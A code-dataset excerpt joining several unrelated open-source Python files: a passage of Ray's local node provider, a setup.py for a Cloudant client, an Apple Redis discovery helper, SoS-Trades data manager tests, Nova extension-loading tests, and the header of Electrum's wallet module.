if worker_ip not in list_of_node_ips:
del workers[worker_ip]
# Set external head ip, if provided by user.
# Necessary if calling `ray up` from outside the network.
# Refer to LocalNodeProvider.external_ip function.
external_head_ip = provider_config.get("external_head_ip")
if external_head_ip:
head = workers[provider_config["head_ip"]]
head["external_ip"] = external_head_ip
assert len(workers) == len(provider_config["worker_ips"]) + 1
with open(self.save_path, "w") as f:
logger.debug(
"ClusterState: " "Writing cluster state: {}".format(workers)
)
f.write(json.dumps(workers))
def get(self):
with self.lock:
with self.file_lock:
workers = json.loads(open(self.save_path).read())
return workers
def put(self, worker_id, info):
assert "tags" in info
assert "state" in info
with self.lock:
with self.file_lock:
workers = self.get()
workers[worker_id] = info
with open(self.save_path, "w") as f:
logger.info(
"ClusterState: "
"Writing cluster state: {}".format(list(workers))
)
f.write(json.dumps(workers))
class OnPremCoordinatorState(ClusterState):
"""Generates & updates the state file of CoordinatorSenderNodeProvider.
    Unlike ClusterState, which generates a cluster-specific file with
    predefined head and worker ips, OnPremCoordinatorState overrides
ClusterState's __init__ function to generate and manage a unified
file of the status of all the nodes for multiple clusters.
"""
def __init__(self, lock_path, save_path, list_of_node_ips):
self.lock = RLock()
self.file_lock = FileLock(lock_path)
self.save_path = save_path
with self.lock:
with self.file_lock:
if os.path.exists(self.save_path):
nodes = json.loads(open(self.save_path).read())
else:
nodes = {}
logger.info(
"OnPremCoordinatorState: "
"Loaded on prem coordinator state: {}".format(nodes)
)
# Filter removed node ips.
for node_ip in list(nodes):
if node_ip not in list_of_node_ips:
del nodes[node_ip]
for node_ip in list_of_node_ips:
if node_ip not in nodes:
nodes[node_ip] = {
"tags": {},
"state": "terminated",
}
assert len(nodes) == len(list_of_node_ips)
with open(self.save_path, "w") as f:
logger.info(
"OnPremCoordinatorState: "
"Writing on prem coordinator state: {}".format(nodes)
)
f.write(json.dumps(nodes))
class LocalNodeProvider(NodeProvider):
"""NodeProvider for private/local clusters.
`node_id` is overloaded to also be `node_ip` in this class.
When `cluster_name` is provided, it manages a single cluster in a cluster
specific state file. But when `cluster_name` is None, it manages multiple
clusters in a unified state file that requires each node to be tagged with
TAG_RAY_CLUSTER_NAME in create and non_terminated_nodes function calls to
associate each node with the right cluster.
The current use case of managing multiple clusters is by
OnPremCoordinatorServer which receives node provider HTTP requests
from CoordinatorSenderNodeProvider and uses LocalNodeProvider to get
the responses.
"""
def __init__(self, provider_config, cluster_name):
NodeProvider.__init__(self, provider_config, cluster_name)
if cluster_name:
lock_path = get_lock_path(cluster_name)
state_path = get_state_path(cluster_name)
self.state = ClusterState(
lock_path,
state_path,
provider_config,
)
self.use_coordinator = False
else:
# LocalNodeProvider with a coordinator server.
self.state = OnPremCoordinatorState(
"/tmp/coordinator.lock",
"/tmp/coordinator.state",
provider_config["list_of_node_ips"],
)
self.use_coordinator = True
def non_terminated_nodes(self, tag_filters):
workers = self.state.get()
matching_ips = []
for worker_ip, info in workers.items():
if info["state"] == "terminated":
continue
ok = True
for k, v in tag_filters.items():
if info["tags"].get(k) != v:
ok = False
break
if ok:
matching_ips.append(worker_ip)
return matching_ips
def is_running(self, node_id):
return self.state.get()[node_id]["state"] == "running"
def is_terminated(self, node_id):
return not self.is_running(node_id)
def node_tags(self, node_id):
return self.state.get()[node_id]["tags"]
def external_ip(self, node_id):
"""Returns an external ip if the user has supplied one.
Otherwise, use the same logic as internal_ip below.
This can be used to call ray up from outside the network, for example
if the Ray cluster exists in an AWS VPC and we're interacting with
the cluster from a laptop (where using an internal_ip will not work).
Useful for debugging the local node provider with cloud VMs."""
node_state = self.state.get()[node_id]
ext_ip = node_state.get("external_ip")
if ext_ip:
return ext_ip
else:
return socket.gethostbyname(node_id)
def internal_ip(self, node_id):
return socket.gethostbyname(node_id)
def set_node_tags(self, node_id, tags):
with self.state.file_lock:
info = self.state.get()[node_id]
info["tags"].update(tags)
self.state.put(node_id, info)
def create_node(self, node_config, tags, count):
"""Creates min(count, currently available) nodes."""
node_type = tags[TAG_RAY_NODE_KIND]
with self.state.file_lock:
workers = self.state.get()
for node_id, info in workers.items():
if info["state"] == "terminated" and (
self.use_coordinator or info["tags"][TAG_RAY_NODE_KIND] == node_type
):
info["tags"] = tags
info["state"] = "running"
self.state.put(node_id, info)
count = count - 1
if count == 0:
return
def terminate_node(self, node_id):
workers = self.state.get()
info = workers[node_id]
info["state"] = "terminated"
self.state.put(node_id, info)
@staticmethod
def bootstrap_config(cluster_config):
return bootstrap_local(cluster_config)
def record_local_head_state_if_needed(local_provider: LocalNodeProvider) -> None:
"""This function is called on the Ray head from StandardAutoscaler.reset
to record the head node's own existence in the cluster state file.
This is necessary because `provider.create_node` in
`commands.get_or_create_head_node` records the head state on the
cluster-launching machine but not on the head.
"""
head_ip = local_provider.provider_config["head_ip"]
cluster_name = local_provider.cluster_name
# If the head node is not marked as created in the cluster state file,
if head_ip not in local_provider.non_terminated_nodes({}):
# These tags are based on the ones in commands.get_or_create_head_node;
# keep in sync.
head_tags = {
TAG_RAY_NODE_KIND: NODE_KIND_HEAD,
TAG_RAY_USER_NODE_TYPE: LOCAL_CLUSTER_NODE_TYPE,
TAG_RAY_NODE_NAME: "ray-{}-head".format(cluster_name),
TAG_RAY_NODE_STATUS: STATUS_UP_TO_DATE,
}
# Mark the head node as created in the cluster state file.
local_provider.create_node(node_config={}, tags=head_tags, count=1)
assert head_ip in local_provider.non_terminated_nodes({})
|
py | b4159effd47d6e635b3df9dce3921b5d64e6fa02 | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name='microcdt', # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.1.1', # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='A microscopic client library for accessing Cloudant databases',
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
long_description=long_description, # Optional
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url='https://github.com/xpqz/microcdt', # Optional
# This should be your name or the name of the organization which owns the
# project.
author='Stefan Kruger', # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='[email protected]', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3'
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='databases development', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
py_modules=["microcdt"],
# packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['requests'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# If using Python 2.6 or earlier, then these have to be included in
# MANIFEST.in as well.
# package_data={ # Optional
# 'sample': ['package_data.dat'],
# },
    # Although 'package_data' is the preferred approach, in some cases you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
# entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
py | b4159f012997ca4c96b5aafc3e90abce36415dce | # Copyright (C) 2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import random
import requests
import threading
import time
from redis import StrictRedis
class CasseroleNodes(object):
DEFAULT_INTERVAL = 120 # Refresh every 2 minutes
def __init__(self, url, interval_seconds=DEFAULT_INTERVAL, asynchronous=True):
self.url = url
self.interval = interval_seconds
self._epoch = 0
self.asynchronous = asynchronous
self._nodes = []
self.retrieve_nodes()
if not self._nodes:
raise RuntimeError(f'Cannot communicate with Casserole url {self.url}')
def retrieve_nodes(self):
casserole_response = requests.get(self.url)
if casserole_response.status_code != 200:
return
self._epoch = time.time()
self._nodes = casserole_response.text.split(',')
@property
def nodes(self):
if self._epoch + self.interval > time.time():
return self._nodes
if self.asynchronous:
request_thread = threading.Thread(target=self.retrieve_nodes)
request_thread.daemon = True
request_thread.start()
else:
self.retrieve_nodes()
return self._nodes
def __len__(self):
return len(self.nodes)
def __iter__(self):
return iter(self.nodes)
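# A minimal usage sketch (the coordinator URL is hypothetical): CasseroleNodes acts
# as a lazily refreshing iterable of host names.
#
#     nodes = CasseroleNodes('https://casserole.example.com/nodes', interval_seconds=60)
#     for host in nodes:   # iterating serves the cached list; a background refresh
#         print(host)      # is kicked off once `interval_seconds` has elapsed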
class CasseroleRedis(object):
DEFAULT_INTERVAL = 120 # Refresh every 2 minutes
def __init__(
self, url, port=6379, password=None, interval_seconds=DEFAULT_INTERVAL, asynchronous=True,
ssl_keyfile=None, ssl_certfile=None, ssl_cert_reqs='required', ssl_ca_certs=None,
):
self.url = url
self.interval = interval_seconds
self.asynchronous = asynchronous
self._redis = None
self._redis_url = None
self._redis_kwargs = dict(
port=port,
password=password,
ssl_keyfile=ssl_keyfile,
ssl_certfile=ssl_certfile,
ssl_cert_reqs=ssl_cert_reqs,
ssl_ca_certs=ssl_ca_certs,
)
self._epoch = time.time()
self.connect()
def connect(self):
if self._redis and self._epoch + self.interval > time.time():
return
def do_connection(obj=self):
casserole_response = requests.get(obj.url)
if casserole_response.status_code != 200:
return
candidates = {}
for candidate in casserole_response.json():
if not candidate['isMaster']:
continue
candidates[candidate['host']] = candidate
if self._redis and self._redis_url in candidates:
# We're still connected, we don't need to do anything
return
self._redis_url = random.choice(list(candidates.keys()))
port = candidates[self._redis_url].get('sslPort')
kwargs = dict(**self._redis_kwargs)
kwargs['port'] = port or kwargs['port']
self._redis = StrictRedis(
host=self._redis_url,
ssl=True if port else False,
**kwargs
)
obj._epoch = time.time()
if self.asynchronous and self._redis:
request_thread = threading.Thread(target=do_connection)
request_thread.daemon = True
request_thread.start()
else:
do_connection()
def ping(self):
self.connect()
return self._redis.ping()
def get(self, name):
self.connect()
return self._redis.get(name)
def set(self, *args, **kwargs):
self.connect()
return self._redis.set(*args, **kwargs)
def lock(self, name, **kwargs):
self.connect()
return self._redis.lock(name, **kwargs)
def delete(self, *names):
self.connect()
return self._redis.delete(*names)
def scan_iter(self, match=None, **kwargs):
self.connect()
return self._redis.scan_iter(match=match, **kwargs)
|
py | b4159f694d16537b2b797f58b3a18b92519997e2 | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.execution_engine.sos_discipline import SoSDiscipline
class TestDataManagerStorage(unittest.TestCase):
"""
Class to test storage of data and disciplines in data manager
"""
def setUp(self):
'''
        Initialize the data needed for testing
'''
self.name = 'SoSDisc'
self.ee = ExecutionEngine('Test')
self.ns_test = 'Test'
self.factory = self.ee.factory
base_path = 'sos_trades_core.sos_wrapping.test_discs'
self.mod1_path = f'{base_path}.disc1.Disc1'
self.mod2_path = f'{base_path}.disc2.Disc2'
def test_01_data_dict(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
# check data_dict and data_id_map lengths
self.assertEqual(len(self.ee.dm.data_dict),
len(self.ee.dm.data_id_map))
# check data id and full names
for var_id in self.ee.dm.data_dict.keys():
var_f_name = self.ee.dm.get_var_full_name(var_id)
self.assertEqual(self.ee.dm.get_data_id(var_f_name), var_id)
# check data_dict content
self.assertIn('Test.Disc1.a', self.ee.dm.data_id_map.keys())
self.assertIn('Test.y', self.ee.dm.data_id_map.keys())
y_dependencies_id = self.ee.dm.get_data(
'Test.y', SoSDiscipline.DISCIPLINES_DEPENDENCIES)
y_dependencies_names = [self.ee.dm.get_disc_full_name(disc_id)
for disc_id in y_dependencies_id]
self.assertListEqual(y_dependencies_names, [
'Test.Disc1', 'Test.Disc2'])
disc_id_list = self.ee.dm.get_discipline_ids_list('Test.Disc1')
# remove keys in DM
self.ee.dm.remove_keys(disc_id_list[0], ['Test.Disc1.a', 'Test.y'])
# check data_dict content after keys deletion
self.assertNotIn('Test.Disc1.a', self.ee.dm.data_id_map.keys())
self.assertIn('Test.y', self.ee.dm.data_id_map.keys())
y_dependencies_id = self.ee.dm.get_data(
'Test.y', SoSDiscipline.DISCIPLINES_DEPENDENCIES)
y_dependencies_names = [self.ee.dm.get_disc_full_name(disc_id)
for disc_id in y_dependencies_id]
self.assertListEqual(y_dependencies_names, [
'Test.Disc2'])
def test_02_disciplines_dict(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
# check disciplines_dict and disciplines_id_map lengths
self.assertEqual(len(self.ee.dm.disciplines_dict),
len(self.ee.dm.disciplines_id_map))
# check disciplines ids and full names
for disc_id in self.ee.dm.disciplines_dict:
disc_f_name = self.ee.dm.get_disc_full_name(disc_id)
self.assertEqual(
self.ee.dm.get_discipline_ids_list(disc_f_name), [disc_id])
# check disciplines_dict content after keys deletion
self.assertListEqual(list(self.ee.dm.disciplines_id_map.keys()), [
'Test', 'Test.Disc1', 'Test.Disc2'])
# remove Disc2
disc2_id = self.ee.dm.get_discipline_ids_list('Test.Disc2')[0]
self.ee.dm.clean_from_disc(disc2_id)
self.assertRaises(
KeyError, lambda: self.ee.dm.clean_from_disc(disc2_id))
# check disciplines_dict and data_dict content after discipline
# deletion
self.assertListEqual(list(self.ee.dm.disciplines_id_map.keys()), [
'Test', 'Test.Disc1'])
self.assertNotIn('Test.Disc2.constant', self.ee.dm.data_id_map)
self.assertNotIn('Test.Disc2.power', self.ee.dm.data_id_map)
self.assertNotIn('Test.z', self.ee.dm.data_id_map)
y_dependencies_id = self.ee.dm.get_data(
'Test.y', SoSDiscipline.DISCIPLINES_DEPENDENCIES)
y_dependencies_names = [self.ee.dm.get_disc_full_name(disc_id)
for disc_id in y_dependencies_id]
self.assertListEqual(y_dependencies_names, [
'Test.Disc1'])
# remove SoSCoupling Test
disc1_id = self.ee.dm.get_discipline_ids_list('Test.Disc1')[0]
self.ee.dm.clean_from_disc(disc1_id)
def test_03_execute(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
self.ee.display_treeview_nodes()
self.assertEqual(self.ee.dm.get_value('Test.x'), None)
self.ee.dm.set_data('Test.x', SoSDiscipline.VALUE, 50.0)
self.assertEqual(self.ee.dm.get_value('Test.x'), 50.0)
a = 1.0
b = 3.0
x = 99.0
values_dict = {self.ns_test + '.x': x,
self.ns_test + '.Disc1.a': a,
self.ns_test + '.Disc1.b': b,
self.ns_test + '.Disc2.constant': 1.5,
self.ns_test + '.Disc2.power': 2}
self.ee.dm.set_values_from_dict(values_dict)
self.assertEqual(self.ee.dm.get_data('Test.x', 'value'), 99.0)
self.assertEqual(self.ee.dm.get_value('Test.x'), 99.0)
self.ee.execute()
def test_04_namespace_change(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
var_id = self.ee.dm.get_data_id('Test.x')
self.assertEqual(self.ee.dm.data_id_map['Test.x'], var_id)
ns_ac = self.ee.ns_manager.ns_list[0]
ns_ac.update_value('New_ns_ac')
self.ee.dm.generate_data_id_map()
self.assertEqual(self.ee.dm.data_id_map['New_ns_ac.x'], var_id)
self.assertNotIn('Test.y', self.ee.dm.data_id_map)
self.assertIn('New_ns_ac.y', self.ee.dm.data_id_map)
self.assertNotIn('Test.z', self.ee.dm.data_id_map)
self.assertIn('New_ns_ac.z', self.ee.dm.data_id_map)
test_id = self.ee.dm.disciplines_id_map['Test'][0]
ns_test = self.ee.dm.disciplines_dict[test_id]['ns_reference']
ns_test.update_value('New_ns_test')
self.ee.dm.generate_disciplines_id_map()
self.assertEqual(
self.ee.dm.disciplines_id_map['New_ns_test'], [test_id])
self.assertNotIn('Test', self.ee.dm.disciplines_id_map)
self.assertIn('Test.sub_mda_class', self.ee.dm.data_id_map)
self.ee.dm.generate_data_id_map()
self.assertIn('New_ns_test.sub_mda_class', self.ee.dm.data_id_map)
def test_05_convert_dict_with_maps(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
self.assertDictEqual(self.ee.dm.data_dict,
self.ee.dm.convert_data_dict_with_ids(self.ee.dm.convert_data_dict_with_full_name()))
|
py | b4159fb6ba39fb209f73cf55c068f49de1607c87 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import stevedore
import webob.exc
from nova.api import openstack
from nova.api.openstack import compute
from nova.api.openstack.compute import plugins
from nova.api.openstack import extensions
from nova import exception
from nova import test
CONF = cfg.CONF
class fake_bad_extension(object):
name = "fake_bad_extension"
alias = "fake-bad"
class fake_stevedore_enabled_extensions(object):
def __init__(self, namespace, check_func, invoke_on_load=False,
invoke_args=(), invoke_kwds={}):
self.extensions = []
def map(self, func, *args, **kwds):
pass
def __iter__(self):
return iter(self.extensions)
class fake_loaded_extension_info(object):
def __init__(self):
self.extensions = {}
def register_extension(self, ext):
self.extensions[ext] = ext
return True
def get_extensions(self):
return {'core1': None, 'core2': None, 'noncore1': None}
class ExtensionLoadingTestCase(test.NoDBTestCase):
def _set_v3_core(self, core_extensions):
openstack.API_V3_CORE_EXTENSIONS = core_extensions
def test_extensions_loaded(self):
app = compute.APIRouterV3()
self.assertIn('servers', app._loaded_extension_info.extensions)
def test_check_bad_extension(self):
extension_info = plugins.LoadedExtensionInfo()
self.assertFalse(extension_info._check_extension(fake_bad_extension))
def test_extensions_blacklist(self):
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_blacklist', ['os-hosts'], 'osapi_v3')
app = compute.APIRouterV3()
self.assertNotIn('os-hosts', app._loaded_extension_info.extensions)
def test_extensions_whitelist_accept(self):
        # NOTE(maurosr): just to avoid getting an exception raised for not
        # loading all of the core API.
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['servers'])
self.addCleanup(self._set_v3_core, v3_core)
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_whitelist', ['servers', 'os-hosts'],
'osapi_v3')
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
def test_extensions_whitelist_block(self):
        # NOTE(maurosr): just to avoid getting an exception raised for not
        # loading all of the core API.
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['servers'])
self.addCleanup(self._set_v3_core, v3_core)
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_whitelist', ['servers'], 'osapi_v3')
app = compute.APIRouterV3()
self.assertNotIn('os-hosts', app._loaded_extension_info.extensions)
def test_blacklist_overrides_whitelist(self):
        # NOTE(maurosr): just to avoid getting an exception raised for not
        # loading all of the core API.
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['servers'])
self.addCleanup(self._set_v3_core, v3_core)
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_whitelist', ['servers', 'os-hosts'],
'osapi_v3')
CONF.set_override('extensions_blacklist', ['os-hosts'], 'osapi_v3')
app = compute.APIRouterV3()
self.assertNotIn('os-hosts', app._loaded_extension_info.extensions)
self.assertIn('servers', app._loaded_extension_info.extensions)
self.assertEqual(len(app._loaded_extension_info.extensions), 1)
def test_get_missing_core_extensions(self):
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['core1', 'core2'])
self.addCleanup(self._set_v3_core, v3_core)
self.assertEqual(len(compute.APIRouterV3.get_missing_core_extensions(
['core1', 'core2', 'noncore1'])), 0)
missing_core = compute.APIRouterV3.get_missing_core_extensions(
['core1'])
self.assertEqual(len(missing_core), 1)
self.assertIn('core2', missing_core)
missing_core = compute.APIRouterV3.get_missing_core_extensions([])
self.assertEqual(len(missing_core), 2)
self.assertIn('core1', missing_core)
self.assertIn('core2', missing_core)
missing_core = compute.APIRouterV3.get_missing_core_extensions(
['noncore1'])
self.assertEqual(len(missing_core), 2)
self.assertIn('core1', missing_core)
self.assertIn('core2', missing_core)
def test_core_extensions_present(self):
self.stubs.Set(stevedore.enabled, 'EnabledExtensionManager',
fake_stevedore_enabled_extensions)
self.stubs.Set(plugins, 'LoadedExtensionInfo',
fake_loaded_extension_info)
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['core1', 'core2'])
self.addCleanup(self._set_v3_core, v3_core)
# if no core API extensions are missing then an exception will
# not be raised when creating an instance of compute.APIRouterV3
compute.APIRouterV3()
def test_core_extensions_missing(self):
self.stubs.Set(stevedore.enabled, 'EnabledExtensionManager',
fake_stevedore_enabled_extensions)
self.stubs.Set(plugins, 'LoadedExtensionInfo',
fake_loaded_extension_info)
self.assertRaises(exception.CoreAPIMissing, compute.APIRouterV3)
def test_extensions_expected_error(self):
@extensions.expected_errors(404)
def fake_func():
raise webob.exc.HTTPNotFound()
self.assertRaises(webob.exc.HTTPNotFound, fake_func)
def test_extensions_expected_error_from_list(self):
@extensions.expected_errors((404, 403))
def fake_func():
raise webob.exc.HTTPNotFound()
self.assertRaises(webob.exc.HTTPNotFound, fake_func)
def test_extensions_unexpected_error(self):
@extensions.expected_errors(404)
def fake_func():
raise webob.exc.HTTPConflict()
self.assertRaises(webob.exc.HTTPInternalServerError, fake_func)
def test_extensions_unexpected_error_from_list(self):
@extensions.expected_errors((404, 413))
def fake_func():
raise webob.exc.HTTPConflict()
self.assertRaises(webob.exc.HTTPInternalServerError, fake_func)
def test_extensions_unexpected_policy_not_authorized_error(self):
@extensions.expected_errors(404)
def fake_func():
raise exception.PolicyNotAuthorized(action="foo")
self.assertRaises(exception.PolicyNotAuthorized, fake_func)
|
py | b4159fd4494fed0bd5f84ee59c974f34d471e818 | # Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - Imported_Wallet: imported address, no keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import os
import threading
import random
import time
import json
import copy
import errno
import traceback
from functools import partial
from collections import defaultdict
from numbers import Number
from decimal import Decimal
import itertools
import sys
from .i18n import _
from .util import (NotEnoughFunds, PrintError, UserCancelled, profiler,
format_satoshis, format_fee_satoshis, NoDynamicFeeEstimates,
TimeoutException, WalletFileException, BitcoinException,
InvalidPassword)
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore
from .storage import multisig_type, STO_EV_PLAINTEXT, STO_EV_USER_PW, STO_EV_XPUB_PW
from . import transaction
from .transaction import Transaction
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
TX_STATUS = [
_('Unconfirmed'),
_('Unconfirmed parent'),
_('Not Verified'),
_('Local'),
]
